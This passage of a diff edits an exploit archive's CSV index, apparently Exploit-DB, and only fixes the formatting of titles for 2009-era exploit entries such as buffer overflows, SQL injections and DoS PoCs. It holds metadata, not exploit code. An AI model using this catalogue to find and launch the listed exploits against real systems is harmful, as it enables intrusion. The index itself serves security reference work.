Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 -8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - (.m3u ) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0 +8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - (.m3u) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)",2009-04-14,e.wiZz!,windows,remote,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service Exploit",2009-04-14,ksa04,multiple,dos,0 @@ -7976,7 +7976,7 @@ id,file,description,date,author,platform,type,port 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulns",2009-04-17,"Code Audit Labs",windows,dos,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - CSRF Privilege Escalation PoC",2009-04-17,"Alfons Luja",php,webapps,0 8469,platforms/linux/dos/8469.c,"XRDP <= 0.4.1 - Remote Buffer Overflow PoC (pre-auth)",2009-04-17,"joe walko",linux,dos,0 -8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - (.Torrent ) Buffer Overflow Exploit",2009-04-17,"Michael Brooks",linux,local,0 +8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - (.Torrent) Buffer Overflow Exploit",2009-04-17,"Michael Brooks",linux,local,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 8472,platforms/php/webapps/8472.txt,"ClanTiger <= 1.1.1 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,YEnH4ckEr,php,webapps,0 8473,platforms/php/webapps/8473.pl,"ClanTiger <= 1.1.1 (slug) Blind SQL Injection Exploit",2009-04-17,YEnH4ckEr,php,webapps,0 @@ -8093,12 +8093,12 @@ id,file,description,date,author,platform,type,port 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injection Vulnerabilities",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Buffer Overflow PoC",2009-05-01,SirGod,windows,dos,0 -8589,platforms/windows/local/8589.py,"RM Downloader - (.smi ) Local Stack Overflow Exploit",2009-05-01,"ThE g0bL!N",windows,local,0 +8589,platforms/windows/local/8589.py,"RM Downloader - (.smi) Local Stack Overflow Exploit",2009-05-01,"ThE g0bL!N",windows,local,0 8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - (.m3u) Local SEH Overwrite Exploit",2009-05-01,His0k4,windows,local,0 8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 - (.M3U) Local Stack Overflow Exploit (2)",2009-05-01,"Encrypt3d.M!nd ",windows,local,0 8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0 8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0 -8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi ) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0 +8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 @@ -8111,7 +8111,7 @@ id,file,description,date,author,platform,type,port 8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 Insecure Cookie Handling Vulnerability",2009-05-04,"ThE g0bL!N",php,webapps,0 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Auth Bypass Vulnerability",2009-05-04,"ThE g0bL!N",php,webapps,0 8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service PoC",2009-05-04,shinnai,windows,dos,0 -8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - (.BMX ) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 +8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - (.BMX) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 8608,platforms/php/webapps/8608.txt,"projectcms 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,asp,webapps,0 @@ -8289,7 +8289,7 @@ id,file,description,date,author,platform,type,port 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script (profile.php user_id) SQL Injection Vulnerability",2009-05-26,Qabandi,php,webapps,0 8789,platforms/windows/local/8789.py,"Slayer 2.4 (skin) Universal Buffer Overflow Exploit (SEH)",2009-05-26,SuNHouSe2,windows,local,0 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0 -8791,platforms/php/webapps/8791.txt,"Wordpress Plugin Lytebox (wp-lytebox) Local File Inclusion Vulnerability",2009-05-26,TurkGuvenligi,php,webapps,0 +8791,platforms/php/webapps/8791.txt,"Wordpress Plugin Lytebox - (wp-lytebox) Local File Inclusion Vulnerability",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities",2009-05-26,asL-Sabia,php,webapps,0 8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulns",2009-05-26,"sniper code",php,webapps,0 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox (unclamped loop) Denial of Service Exploit",2009-05-26,"Thierry Zoller",multiple,dos,0 @@ -8452,7 +8452,7 @@ id,file,description,date,author,platform,type,port 8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla Component com_ijoomla_rss Blind SQL Injection Exploit",2009-06-15,"Mehmet Ince",php,webapps,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime CRGN Atom Local Crash Exploit",2009-06-15,webDEViL,linux,dos,0 -8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability",2009-06-15,Kacper,php,webapps,0 +8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - (id) SQL Injection Vulnerability",2009-06-15,Kacper,php,webapps,0 8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln",2009-06-15,SirGod,php,webapps,0 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0 @@ -8544,7 +8544,7 @@ id,file,description,date,author,platform,type,port 9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 - Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 -9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U ) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 +9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message Vulnerability",2009-07-01,Stack,php,webapps,0 9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 Insecure Cookie Handling Vulnerability",2009-07-01,Stack,php,webapps,0 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (seh)",2009-07-01,hack4love,windows,local,0 @@ -8592,7 +8592,7 @@ id,file,description,date,author,platform,type,port 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection Vulnerability/RCE Exploit",2009-07-10,darkjoker,php,webapps,0 -9110,platforms/php/webapps/9110.txt,"WordPress Privileges Unchecked in admin.php and Multiple Information",2009-07-10,"Core Security",php,webapps,0 +9110,platforms/php/webapps/9110.txt,"WordPress - Privileges Unchecked in admin.php and Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple Remote SQL Injection Vulnerabilities",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla Component com_propertylab (auction_id) SQL Injection Vuln",2009-07-10,"Chip d3 bi0s",php,webapps,0 9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 @@ -8620,7 +8620,7 @@ id,file,description,date,author,platform,type,port 9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 (ListData.dat) Universal Buffer Overflow Exploit (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x products.php SQL Injection Vulnerability",2009-07-13,Affix,php,webapps,0 -9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - (.wav ) Crash Exploit",2009-07-14,prodigy,windows,remote,0 +9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - (.wav) Crash Exploit",2009-07-14,prodigy,windows,remote,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - (DJcalendar.cgi TEMPLATE) File Disclosure Vuln",2009-07-14,cibbao,cgi,webapps,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - (.ICP) Local Stack Overflow PoC",2009-07-14,"ThE g0bL!N",windows,dos,0 9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z .Mpr - Local Buffer Overflow Exploit",2009-07-14,n00b,windows,local,0 @@ -8659,7 +8659,7 @@ id,file,description,date,author,platform,type,port 9175,platforms/multiple/dos/9175.txt,"Sguil/PADS Remote Server Crash Vulnerability",2009-07-17,Ataraxia,multiple,dos,0 9176,platforms/php/webapps/9176.txt,"dB Masters Multimedia's Content Manager 4.5 - SQL Injection Vulnerability",2009-07-16,NoGe,php,webapps,0 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Universal BoF Exploit",2009-07-16,Crazy_Hacker,windows,local,0 -9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - (.mp3 ) Crash Exploit",2009-07-16,prodigy,windows,dos,0 +9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - (.mp3) Crash Exploit",2009-07-16,prodigy,windows,dos,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion Vulnerability",2009-07-17,JIKO,php,webapps,0 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 (entry) SQL Injection Vulnerability",2009-07-17,JIKO,php,webapps,0 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 @@ -8698,7 +8698,7 @@ id,file,description,date,author,platform,type,port 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-07-20,InjEctOr5,php,webapps,0 9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 - (.srt) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 -9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM ) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 +9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection Vulnerability",2009-07-21,n3w7u,php,webapps,0 @@ -8723,7 +8723,7 @@ id,file,description,date,author,platform,type,port 9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit (osx)",2009-07-24,Dr_IDE,osx,remote,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Auth Bypass) SQL Injection Vulnerability",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability",2009-07-24,s4r4d0,php,webapps,0 -9250,platforms/php/webapps/9250.sh,"Wordpress 2.8.1 (url) Remote Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 +9250,platforms/php/webapps/9250.sh,"Wordpress 2.8.1 - (url) Remote Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection Vulnerability",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection Exploit",2009-07-24,Coksnuss,php,webapps,0 9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 @@ -8801,7 +8801,7 @@ id,file,description,date,author,platform,type,port 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites",2009-08-01,SirGod,php,webapps,0 9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - (auth bypass/SQL) Multiple Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd (Auth Bypass) SQL Injection Vulnerability",2009-08-03,Ro0T-MaFia,asp,webapps,0 -9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional - (.PLF ) Local Buffer Overflow Exploit (SEH)",2009-08-03,hack4love,windows,local,0 +9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional - (.PLF) Local Buffer Overflow Exploit (SEH)",2009-08-03,hack4love,windows,local,0 9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser (defer) Remote BoF Exploit (SEH)",2009-08-03,His0k4,windows,remote,0 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability",2009-08-03,"cr4wl3r ",php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script (Auth Bypass) SQL Injection Vulnerability",2009-08-03,Cicklow,php,webapps,0 @@ -8836,7 +8836,7 @@ id,file,description,date,author,platform,type,port 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC",2009-08-04,"Pankaj Kohli",windows,dos,0 9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC",2009-08-05,schnuddelbuddel,windows,dos,0 9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0 -9364,platforms/windows/local/9364.py,"Tuniac 090517c - (.m3u ) Local File Crash PoC",2009-08-05,Dr_IDE,windows,local,0 +9364,platforms/windows/local/9364.py,"Tuniac 090517c - (.m3u) Local File Crash PoC",2009-08-05,Dr_IDE,windows,local,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 (afd/rfi) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0 9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 (udd/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 @@ -8861,7 +8861,7 @@ id,file,description,date,author,platform,type,port 9387,platforms/php/webapps/9387.tx,"Banner Exchange Script 1.0 (targetid) Blind SQL Injection Vuln",2009-08-07,"599eme Man",php,webapps,0 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 (forumid) Remote SQL Injection Vulnerability",2009-08-07,Ruzgarin_Oglu,php,webapps,0 9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 (idTableProduit) SQL Injection Vulnerability",2009-08-07,Red-D3v1L,php,webapps,0 -9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u ) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 +9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit",2009-08-07,"Jafer Al Zidjali",php,webapps,0 9395,platforms/php/webapps/9395.txt,"PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability",2009-08-07,CoBRa_21,php,webapps,0 @@ -8921,7 +8921,7 @@ id,file,description,date,author,platform,type,port 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BoF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0 -9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - (.mp3 ) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 +9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - (.mp3) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Auth Bypass & Password Reset Vulnerabilities (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party <= 0.98.3 - Remote File Inclusion Vulnerability",2009-08-18,"cr4wl3r ",php,webapps,0 @@ -8959,7 +8959,7 @@ id,file,description,date,author,platform,type,port 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure Vuln",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS (Auth Bypass) SQL Injection Vulnerability",2009-08-24,next,php,webapps,0 -9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - (.wav ) Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 +9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - (.wav) Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9496,platforms/windows/dos/9496.txt,"WAR-FTPD 1.65 (MKD/CD Requests) Denial of Service Vuln",2009-08-24,"opt!x hacker",windows,dos,0 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit",2009-08-24,Mr.SQL,php,webapps,0 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities",2009-08-24,"Jean Trolleur",hardware,remote,0 @@ -9130,7 +9130,7 @@ id,file,description,date,author,platform,type,port 9668,platforms/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - (.jpg) Local Crash PoC",2009-09-14,the_Edit0r,windows,dos,0 9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 (page) Remote SQL Injection Vulnerability",2009-09-14,Bgh7,php,webapps,0 9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - (.XML) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0 -9671,platforms/windows/dos/9671.py,"Tuniac 090517c - (.pls ) Local Crash PoC",2009-09-14,zAx,windows,dos,0 +9671,platforms/windows/dos/9671.py,"Tuniac 090517c - (.pls) Local Crash PoC",2009-09-14,zAx,windows,dos,0 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BoF Exploit (SEH) (0day)",2009-09-15,blake,windows,remote,6660 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,snakespc,php,webapps,0 @@ -9403,7 +9403,7 @@ id,file,description,date,author,platform,type,port 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80 10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443 -10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787 +10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - _Secure_ Overflow",2004-07-18,onetwo,linux,remote,7787 10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution",2001-09-01,"H D Moore",irix,remote,515 10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515 10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow",2008-01-08,MC,bsd,remote,49 @@ -9459,7 +9459,7 @@ id,file,description,date,author,platform,type,port 10086,platforms/multiple/remote/10086.txt,"WebKit 'Document()' Function Remote Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0 10087,platforms/multiple/remote/10087.txt,"WebKit XML External Entity Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0 10088,platforms/php/webapps/10088.txt,"WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability",2009-11-10,"Fernando Arnaboldi",php,webapps,0 -10089,platforms/php/webapps/10089.txt,"WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 +10089,platforms/php/webapps/10089.txt,"WordPress <= 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 - 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote DoS",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 @@ -9513,7 +9513,7 @@ id,file,description,date,author,platform,type,port 10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 - Linux - Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0 10208,platforms/windows/dos/10208.txt,"Firefox + Adobe - Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0 10209,platforms/multiple/webapps/10209.txt,"Everfocus <= 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 -10210,platforms/windows/dos/10210.txt,"Internet Explorer 6/7 CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 +10210,platforms/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10212,platforms/windows/local/10212.txt,"Autodesk 3DS Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 @@ -9543,7 +9543,7 @@ id,file,description,date,author,platform,type,port 10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 pls Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability",2009-11-28,DigitALL,php,webapps,0 -10242,platforms/php/webapps/10242.txt,"PHP ""multipart/form-data"" Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0 +10242,platforms/php/webapps/10242.txt,"PHP _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0 10243,platforms/php/webapps/10243.txt,"PHP MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,webapps,0 10244,platforms/windows/local/10244.txt,"MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 10245,platforms/php/webapps/10245.txt,"phpBazar <= 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0 @@ -9611,7 +9611,7 @@ id,file,description,date,author,platform,type,port 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 -10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0 +10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0 10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 @@ -9628,7 +9628,7 @@ id,file,description,date,author,platform,type,port 10341,platforms/php/webapps/10341.txt,"SiSplet CMS <= 